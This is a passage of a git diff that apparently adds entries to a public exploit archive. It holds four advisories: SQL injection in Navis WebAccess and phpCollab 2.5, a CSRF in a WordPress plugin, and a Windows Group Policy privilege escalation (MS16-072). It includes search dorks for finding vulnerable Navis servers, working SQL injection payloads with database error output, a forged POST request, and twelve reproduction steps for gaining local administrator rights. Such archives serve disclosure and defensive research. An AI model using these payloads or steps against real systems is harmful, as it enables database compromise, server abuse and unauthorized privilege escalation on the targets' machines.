Marcos",linux,remote,0 40202,platforms/php/webapps/40202.txt,"Subrion CMS 4.0.5 - SQL Injection",2016-08-05,Vulnerability-Lab,php,webapps,80 @@ -36366,3 +36366,7 @@ id,file,description,date,author,platform,type,port 40213,platforms/cgi/webapps/40213.txt,"NUUO NVRmini 2 3.0.8 - (ShellShock) Remote Code Execution",2016-08-06,LiquidWorm,cgi,webapps,80 40214,platforms/php/webapps/40214.txt,"NUUO NVRmini 2 3.0.8 - Arbitrary File Deletion",2016-08-06,LiquidWorm,php,webapps,80 40215,platforms/php/webapps/40215.txt,"NUUO NVRmini 2 3.0.8 - (strong_user.php) Backdoor Remote Shell Access",2016-08-06,LiquidWorm,php,webapps,80 +40216,platforms/jsp/webapps/40216.txt,"Navis WebAccess - SQL Injection",2016-08-08,bRpsd,jsp,webapps,9000 +40218,platforms/php/webapps/40218.txt,"phpCollab CMS 2.5 - (emailusers.php) SQL Injection",2016-08-08,Vulnerability-Lab,php,webapps,80 +40219,platforms/windows/local/40219.txt,"Microsoft Windows Group Policy - Privilege Escalation (MS16-072)",2016-08-08,"Nabeel Ahmed",windows,local,0 +40220,platforms/php/webapps/40220.txt,"WordPress Add From Server Plugin < 3.3.2 - (File Upload) CSRF",2016-08-08,"Edwin Molenaar",php,webapps,80 diff --git a/platforms/jsp/webapps/40216.txt b/platforms/jsp/webapps/40216.txt new file mode 100755 index 000000000..6f10342b3 --- /dev/null +++ b/platforms/jsp/webapps/40216.txt @@ -0,0 +1,58 @@ +@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ + +Product -> Navis WebAccess - SQL Injection +Date -> 8/8/2016 +Author -> bRpsd +Skype: vegnox +Vendor HomePage -> http://www.navis.com/ +Product Download -> http://navis.com/pr_webaccess.jsp (currently under maintenance) +Product Version -> Express/All +DBMS -> Oracle +Tested on > Apache/2.0.54 (Win32) + + +{{ Dorks }} + +"Copyright © 2016 Navis, A Zebra Technologies Company" +"Confidential Information of Navis, A Zebra Technologies Company" +inurl:GKEY= ext:do +inurl:/express/secure/Today.jsp +navis.com webaccess +@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ + + + ############# + |DESCRIPTION| + ############# +"Navis WebAccess is a web-based application that provides all parties across the terminal with an easy-to-use web browser interface for accessing a wealth of transaction data that was previously inaccessible from outside the terminal. All terminal constitiuents, including shipping lines, trucking companies, port authorities, government agencies, agents, shippers, consignees, distribution centers and depots are better served with 24/7 access to real-time container, vessel and truck transaction information. Users can view load and discharge lists, reports, and EDO details as well as view and make appointments, set and release holds, download and upload EDI files and pay for demurrage." + + + +Vulnerability: SQL Injection +File: /express/showNotice.do +Vul Parameter: GKEY + + +================================================================================================ +Test #1 + +http://localhost:9000/express/showNotice.do?report_type=1&GKEY=2' + + +Response Error: + +ORA-00933: SQL command not properly ended +================================================================================================ + + +Test #2 => Payload (Proof Of Concept) + +http://localhost:9000/express/showNotice.do?report_type=1&GKEY=2 AND 9753=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(118)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (9753=9753) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(107)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL) + + +Response Error: + +ORA-00600: internal error code, arguments: [733], [277608912], [pga heap], [], [], [], [], [], [], [], [], [] ORA-06512: at "SYS.XMLTYPE", line 310 ORA-06512: at line 1 +====================================================================================================================================================================================== + +~ \ No newline at end of file diff --git a/platforms/php/webapps/40218.txt b/platforms/php/webapps/40218.txt new file mode 100755 index 000000000..a48586fcf --- /dev/null +++ b/platforms/php/webapps/40218.txt @@ -0,0 +1,176 @@ +Document Title: +=============== +phpCollab v2.5 CMS - SQL Injection Vulnerability + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1898 + + +Release Date: +============= +2016-08-08 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1898 + + +Common Vulnerability Scoring System: +==================================== +6.6 + + +Product & Service Introduction: +=============================== +phpCollab is an open source internet-enabled system for use in projects that require collaboration over the internet. Those organizations, +such as consulting firms, that rely on a division between firm-side and client-side information will benefit most from use of phpCollab. + + +Abstract Advisory Information: +============================== +The vulnerability laboratory research team discovered a remote sql-injection web vulnerability in the official phpCollab v2.5 content management system. + + +Vulnerability Disclosure Timeline: +================================== +2016-08-08: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +phpCollab Community +Product: phpCollab - Content Management System 2.5 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +A remote sql-injection web vulnerability has been discovered in the official phpCollab v2.5 content management system. +The vulnerability allows remote attackers to execute own malicious sql commands to compromise the application or dbms. + +The sql-injection vulnerability is located in the `id` parameter of the `./phpcollab/users/` module GET method request. +Remote attackers are able to execute own sql commands by usage of the insecure `emailusers.php` file GET method request. +The attack vector of the vulnerability is application-side and the request method to inject is GET The vulnerability +is a classic select remote sql-injection. + +The security risk of the vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.6. +Exploitation of the remote sql injection web vulnerability requires no user interaction or privileged web-application user account. +Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise. + +Request Method(s): + [+] GET + +Vulnerable Module(s): + [+] ./phpcollab/users/ + +Vulnerable File(s): + [+] emailusers.php + +Vulnerable Parameter(s): + [+] id + + +Proof of Concept (PoC): +======================= +The remote sql-injection web vulnerability can be exploited by remote attackers without privileged web-application user account and without user interaction. +For security demonstration or to reproduce the sql-injection web vulnerability follow the provided information and steps below to continue. + + +PoC: Exploitation +http://phpcollab.localhost:8080/phpcollab/users/emailusers.php?id=1'[SQL-INJECTION VULNERABILITY!]&&PHPSESSID=ghtu76jt276nji04lua07930t5 + + +--- Error Exception Logs [SQL] --- +You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 +- +You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 2 +- +You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 3 + + +--- PoC Session Logs [GET] --- +Status: 200[OK] +GET http://phpcollab.localhost:8080/phpcollab/users/emailusers.php?id=1%27&&PHPSESSID=ghtu76jt276nji04lua07930t5 +Mime Type[text/html] + Request Header: + Host[phpcollab.localhost:8080] + User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0] + Cookie[PHPSESSID=ghtu76jt276nji04lua07930t5; _pk_id.2.bb5e=7b20cb9175a196a9.1470585617.1.1470586689.1470585617.; + _pk_ref.2.bb5e=%5B%22%22%2C%22%22%2C1470585617%2C%22http%3A%2F%2Fphpcollab.localhost:8080%2Fdemo%2F1%2F394%2FStash%22%5D; _pk_ses.2.bb5e=*] + Connection[keep-alive] + Cache-Control[max-age=0] + Response Header: + Server[nginx/1.2.1] + Content-Type[text/html] + Transfer-Encoding[chunked] + Connection[keep-alive] + X-Powered-By[PHP/5.5.27-1+deb.sury.org~precise+1] + + +Reference(s): +http://phpcollab.localhost:8080/ +http://phpcollab.localhost:8080/phpcollab/ +http://phpcollab.localhost:8080/phpcollab/users/ +http://phpcollab.localhost:8080/phpcollab/users/emailusers.php + + +Solution - Fix & Patch: +======================= +The vulnerability can be patched by usage of a prepared statement in the emailusers.php file GET method request. +Disallow special chars and escape the input and outpit context entries to prevent further sql-injection attacks. + + +Security Risk: +============== +The security risk of the remote sql-injection web vulnerability in the id parameter of the emailusers.php file is estimated as high. (CVSS 6.6) + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.) + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, +including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, +including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised +of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing +limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact +Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically +redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or +its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific +authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission. + + Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™ + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM +SERVICE: www.vulnerability-lab.com + + diff --git a/platforms/php/webapps/40220.txt b/platforms/php/webapps/40220.txt new file mode 100755 index 000000000..002719bde --- /dev/null +++ b/platforms/php/webapps/40220.txt @@ -0,0 +1,51 @@ +Cross-Site Request Forgery vulnerability in Add From Server WordPress Plugin + +Abstract + +It was discovered that Add From Server is vulnerabile to Cross-Site Request Forgery. It can be exploited by luring the target user into clicking a specially crafted link or visiting a malicious website (or advertisement). An attacker can use this issue to add illegal content to the victims server, or add very large files to the victim's server to exaust the amount of avalible disk space. + +Contact + +For feedback or questions about this advisory mail us at sumofpwn at securify.nl + +The Summer of Pwnage + +This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam. + +OVE ID + +OVE-20160718-0004 + +Tested versions + +These issues were successfully tested on Add From Server WordPress Plugin version 6.2. + +Fix + +This issue is resolved in Add From Server version 3.3.2. + +Introduction + +The Add From Server WordPress Plugin is a quick plugin, which allows you to import media & files into the WordPress uploads manager from (remote) webservers. It was discovered that Add From Server is vulnerabile to Cross-Site Request Forgery. It can be exploited by luring the target user into clicking a specially crafted link or visiting a malicious website (or advertisement). Because of this, +the following attack scenario's could be possible: + +- Adding illegal content to the victim's server. +- Adding very large files to the victim's server to exaust the amount of avalible disk space. + +Details + +When a (media) file is added from the server, the source is not validated. This means that not only files from the localhost can be added, but also from other sources. The affected code is not protected with an anti-Cross-Site Request Forgery token. + +The function handle_imports() only removes slashes. The vulnerability exists in the file add-from-server/class.add-from-server.php (line 213). Because slashes are removed, the file that will be uploaded must exist in the server root. For example: www.example.com/largefile.txt + +The host and filename will be set in a separate parameter, so no slashes are needed. + +Proof of concept + +POST /wp-admin/upload.php?page=add-from-server HTTP/1.1 +Host: +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Connection: close +Content-Type: application/x-www-form-urlencoded + +files%5B%5D=largefile.txt&import-date=current&cwd=www.example.com&import=Import \ No newline at end of file diff --git a/platforms/windows/local/40219.txt b/platforms/windows/local/40219.txt new file mode 100755 index 000000000..ae42bb37f --- /dev/null +++ b/platforms/windows/local/40219.txt @@ -0,0 +1,42 @@ +# Exploit Title: Group Policy Elevation of Privilege Vulnerability +# Date: 08-08-2016 +# Exploit Author: Nabeel Ahmed +# Tested on: Windows 7 Professional (x32/x64) +# CVE : CVE-2016-3223 +# Category: Privilege Escalation + +SPECIAL CONFIG: Standard Domain Member configuration with valid credentials. (Standard Domain User with valid credentials) +SUMMARY: This vulnerability allows an attacker to create/modify local Administrator account through a fake Domain Controller by creating User Configuration Group Policies. + +1) Prerequisites: + - Standard Windows 7 Fully patched and member of an existing domain. (e.g. domain.local) + - Domain User Credentials are known with no Administrative rights. + - Computer has to be connected on a network. + - Fake Domain Controller + +2) Reproduce: + STEP 1: Determine domain of the target computer (e.g. domain.local) + STEP 2: Boot system and determine FQDN of the device. (example. CLIENT.domain.local), this can be obtained by monitoring the network broadcast communication, which the system sends prior to loggin in. The username can be extracted from the loginscreen (E.g USER1) + STEP 3: Create Active Directory for the domain you obtained in STEP 2 (domain.local). + STEP 4: Create User with similar name and password as the target computer. (E.g. domain\USER1:password123!). + STEP 5: Login on the target system with the known Username and Password without any network connection (using cached credentials). + STEP 6: Establish network connection between the target system and the newly created Domain Controller. + STEP 7: Create a Group Policy called "Create Local Admin" + STEP 8: Edit the "Create Local Admin" Group Policy to create in the User Configuration section a new user called "TestAdmin" and add him to the group "Administrators". + STEP 9: Open Command Prompt on the target system and execute the following command: "gpupdate /target:user /force" + STEP 10: User Policy update will complete successfully. + STEP 11: Confirm the newly created Administrator "TestAdmin" by executing the following command in Command Prompt: "net localgroup Administrators" + STEP 12: "TestAdmin" user will be member of the Administrators group. + +3) Impact: + A regular Domain User can gain higher privileges on his system by creating a new administrator through Group Policies created on a fake Domain Controller + +4) Solution: + Install the latest patches from 14-06-2016 using Windows Update. + +5) References: + https://technet.microsoft.com/en-us/library/security/ms16-072.aspx + https://support.microsoft.com/en-us/kb/3163622 + +6) Credits: + Vulnerability discovered by Nabeel Ahmed (https://twitter.com/NabeelAhmedBE) and Tom Gilis (https://twitter.com/tgilis) of Dimension Data (https://www.dimensiondata.com)